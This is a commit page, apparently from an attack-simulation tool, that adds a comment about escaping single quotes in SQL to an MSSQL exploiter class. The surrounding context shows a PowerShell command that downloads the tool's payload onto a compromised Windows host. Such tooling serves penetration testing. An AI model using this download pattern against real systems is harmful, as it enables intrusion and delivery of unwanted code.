Agent: Add a comment about escaping single quotes in SQL

This commit is contained in:
Mike Salvatore 2022-06-15 08:14:29 -04:00
parent 83a2a911e9
commit 62cc401981
1 changed files with 2 additions and 0 deletions

View File

@ -31,6 +31,8 @@ class MSSQLExploiter(HostExploiter):
TMP_FILE_NAME = "tmp_monkey.bat" TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
# Single quotes are escaped in SQL by using two of them.
# Example: 'It ain''t over ''til it''s over'
MONKEY_DOWNLOAD_COMMAND = ( MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"